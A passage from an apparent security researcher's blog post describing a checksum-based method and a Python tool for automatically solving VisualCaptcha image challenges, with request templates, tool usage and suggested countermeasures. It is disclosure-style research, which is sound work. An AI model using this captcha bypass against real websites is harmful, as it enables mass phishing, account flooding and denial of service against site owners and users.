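        if normalize is not None:
            checksums.append(md5_hex(normalize(raw)))
        for checksum in checksums:
            if lookup.get(checksum) == wanted:
                # "values" follows the display order of the images
                return start_data["imageFieldName"], start_data["values"][index]
    return None


# Toy data standing in for four downloaded images
images = [b"cat-bytes", b"tree-bytes", b"car-bytes", b"key-bytes"]
lookup = {
    md5_hex(b"cat-bytes"): "Cat",
    md5_hex(b"tree-bytes"): "Tree",
    md5_hex(b"car-bytes"): "Car",
    md5_hex(b"key-bytes"): "Key",
}
start_data = {
    "imageName": "Tree",
    "imageFieldName": "field42",
    "values": ["v0", "v1", "v2", "v3"],
}
print(solve_captcha(start_data, images, lookup))  # prints ('field42', 'v1')
```

Checking the raw checksum first covers older versions without random bytes; the normalized checksum covers the newer ones.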

We put all this into a script and test it directly on the demo portal “demo.visualcaptcha.net”. As a reminder, depending on the captcha submitted, the “/try” endpoint makes a 302 redirect to:

  • Location: /?status=failedImage (invalid captcha checked on server side)
  • Location: /?status=validImage (valid captcha checked on server side)

To make the VisualCaptchaBreaker script as generic as possible, it takes a raw HTTP request as input, in which the captcha field has been replaced with placeholders that the script automatically fills in with the values of the broken captcha.

So (via Burp for example), save the final request to a text file and replace the captcha name / value with the variables “%VISUALCAPTCHANAME%” and “%VISUALCAPTCHAVALUE%”:

POST /try HTTP/1.1
Host: demo.visualcaptcha.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://demo.visualcaptcha.net/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52


This example uses standard POST data; another example with POST multipart/form-data is here.
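To illustrate the placeholder mechanism, here is a minimal sketch that fills a raw request template and recomputes “Content-Length”. It is not taken from VisualCaptchaBreaker: the function name is mine, the request body in the example is invented, and the sketch assumes the file uses CRLF line endings with a blank line before the body.

```python
def fill_request_template(raw_request, field_name, field_value):
    """Replace the captcha placeholders and recompute Content-Length."""
    filled = raw_request.replace("%VISUALCAPTCHANAME%", field_name)
    filled = filled.replace("%VISUALCAPTCHAVALUE%", field_value)
    head, separator, body = filled.partition("\r\n\r\n")
    if not separator:
        return filled  # no body found (for example a GET request)
    headers = []
    for line in head.split("\r\n"):
        if line.lower().startswith("content-length:"):
            # The body length changed once the placeholders were replaced
            line = "Content-Length: {0}".format(len(body.encode("utf-8")))
        headers.append(line)
    return "\r\n".join(headers) + separator + body


# Invented template: only the two placeholders come from the article
template = (
    "POST /try HTTP/1.1\r\n"
    "Host: demo.visualcaptcha.net\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "%VISUALCAPTCHANAME%=%VISUALCAPTCHAVALUE%"
)
print(fill_request_template(template, "field42", "v1"))
```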

Download the latest VisualCaptchaBreaker, and run the script:

[ Download Script Python final VisualCaptchaBreaker-latest.py ]

$ python VisualCaptchaBreaker-latest.py -h

 __      ___                 _  _____            _       _
 \ \    / (_)               | |/ ____|          | |     | |
  \ \  / / _ ___ _   _  __ _| | |     __ _ _ __ | |_ ___| |__   __ _
   \ \/ / | / __| | | |/ _` | | |    / _` | '_ \| __/ __| '_ \ / _` |
    \  /  | \__ \ |_| | (_| | | |___| (_| | |_) | || (__| | | | (_| |
     \/   |_|___/\__,_|\__,_|_|\_____\__,_| .__/ \__\___|_| |_|\__,_|
               |  _ \               | |   | |
               | |_) |_ __ ___  __ _| | __|_| _ __
               |  _ <| '__/ _ \/ _` | |/ / _ \ '__|
               | |_) | | |  __/ (_| |   <  __/ |
               |____/|_|  \___|\__,_|_|\_\___|_|

Title:                  VisualCaptchaBreaker.py  Version: 1.0.0
Author:                 Yann CAM
Website:                www.asafety.fr
Source:                 github.com/yanncam/VisualCaptchaBreaker
Description:            Breaking any VisualCaptcha 5.x with 100% success rate

usage: VisualCaptchaBreaker-latest.py [OPTIONS]

Breaking any VisualCaptcha 5.x with 100% success rate :
        eg: python VisualCaptchaBreaker-latest.py -f TARGET_REQUEST.txt
        eg: python VisualCaptchaBreaker-latest.py -d TARGET_DIRECTORY
        eg: python VisualCaptchaBreaker-latest.py -f TARGET_REQUEST.txt -p "" -n 10
        eg: python VisualCaptchaBreaker-latest.py -f TARGET_REQUEST.txt -s "/visualCaptcha-PHP/public/start" -i "/visualCaptcha-PHP/public/image" -n 10 -c -v --https

TARGET_REQUEST.txt sample raw request file (to demo.visualcaptcha.net) :
        POST /try HTTP/1.1
        Host: demo.visualcaptcha.net
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
        Referer: http://demo.visualcaptcha.net/
        Cookie: PHPSESSID=MyFaKeSeSsIoNiD
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 52


optional arguments:
  -h, --help            show this help message and exit
  -n NUMBER, --number NUMBER
                        Number of request(s) to make (default: 1)
                        VisualCaptcha initialization path (default: /start)
                        VisualCaptcha image path (default: /image)
  -c, --cookie          Use cookie defined in raw HTTP file(s)
  -f FILES [FILES ...], --files FILES [FILES ...]
                        Files containing raw HTTP requests with %VISUALCAPTCHANAME% and %VISUALCAPTCHAVALUE% as POST param
  -d DIRECTORY, --directory DIRECTORY
                        Directory containing raw HTTP requests in files with %VISUALCAPTCHANAME% and %VISUALCAPTCHAVALUE% as POST param
  -p PROXY, --proxy PROXY
                        HTTP Proxy to send requests via. (Burp eg:
  --https               Use HTTPS
  -v, --verbose         Debug logging

An example run of 10 requests, breaking VisualCaptcha on the demo portal with 100% success, is shown in the video:

Bingo! “status=validImage” for each test! (Tested with more than 10,000 requests, with 100% success.)


It was during one of my pentest missions that I came to test VisualCaptcha. It was built in as the default captcha solution of a well-known and widely used CMS.

By digging a little into this captcha solution, which claims to be “never broken by a bot (as far we know)”, I pushed the analysis as far as writing this article and creating a tool with a 100% success rate.

The VisualCaptcha I was up against was obsolete (an old version from before 2014), and the protection that adds 1 to 50 random bytes to the images was not present… A first version of the script was therefore based on PNG checksums, without any conversion to JPG.

Only after looking into the latest VisualCaptcha, particularly through the demo portal, did I successfully implement the idea of converting to JPG to bypass this protection.

VisualCaptcha is a great solution (though breakable). But in the end, a captcha that relies on a knowledge base of fixed size cannot be considered secure.

It is one of the few solutions that is simple to implement, compatible with a multitude of technologies, fully open-source, good-looking and easy to use (it must be said!), while being particularly well suited to touchscreen devices.

How can security be improved in this case? Several ideas:

  • Add “behavioral” controls, like Google’s “reCAPTCHA”, to the validation process.
  • Improve the image randomization: in addition to the 1 to 50 added bytes, alter pixels so that checksums differ even after conversion to JPG.
    • OCR solutions could certainly still get around this, but the scripting task would become more complex for a potential attacker.
    • There are also alternatives to plain checksums, such as pHash, that could still defeat this countermeasure.
  • If the images receive random bytes on every load (to defeat checksums), think about doing the same for the audio (which seems to be the case, to be verified!).
  • To limit mass submission of forms protected by VisualCaptcha, it would be useful to enforce a minimum time between the initialization of the captcha (AJAX call to “/start”) and the final form submission. For a contact form, for example, the user needs at least a few seconds to fill out all the fields and select the right image, so this check could be added natively.
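The last idea, a minimum delay between “/start” and the form submission, could look like the sketch below on the server side. It is only an illustration: the session is modeled as a plain dict, the 3-second threshold is arbitrary, and none of these names exist in VisualCaptcha.

```python
import time

MIN_SOLVE_SECONDS = 3.0  # arbitrary threshold chosen for this example


def mark_captcha_started(session, now=None):
    """Call when /start is served: remember when the captcha was issued."""
    session["captcha_started_at"] = time.time() if now is None else now


def submission_allowed(session, now=None):
    """Call when the form is submitted: reject answers that arrive too fast."""
    started = session.get("captcha_started_at")
    if started is None:
        return False  # the form was submitted without initializing a captcha
    now = time.time() if now is None else now
    return (now - started) >= MIN_SOLVE_SECONDS


session = {}  # stands in for the server-side session
mark_captcha_started(session, now=100.0)
print(submission_allowed(session, now=100.2))  # a script answering instantly
print(submission_allowed(session, now=104.0))  # a human taking a few seconds
```

This does not stop an attacker (a script can simply wait), but it caps the submission rate per session.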

An issue was opened on the official VisualCaptcha GitHub to present these ideas and the demonstration.

For the initial pentest I was conducting, breaking VisualCaptcha made it possible to develop scripts / PoCs illustrating attack scenarios:

  • Sending fraudulent mass emails, with phishing attempts
  • Creating thousands / millions of user accounts to saturate a database
  • Uploading a multitude of files to saturate the server-side disk space and cause a denial of service (DoS)
  • Etc.

All these targeted forms were initially protected by VisualCaptcha.

In the future, when I get some time, I’ll dig into the “audio” side of the solution…

I would like to thank Bruno Bernardino, one of the main developers of VisualCaptcha and the initiator of the project, for his kindness and his interest in the discussions we had on GitHub.


About the Author: Yann C.

An IT security consultant, self-taught and active in the field since the early 2000s out of passion, pleasure and for its prospects, he maintains the ASafety portal to present articles, personal projects, research and development, as well as advisories for vulnerabilities discovered notably during pentests.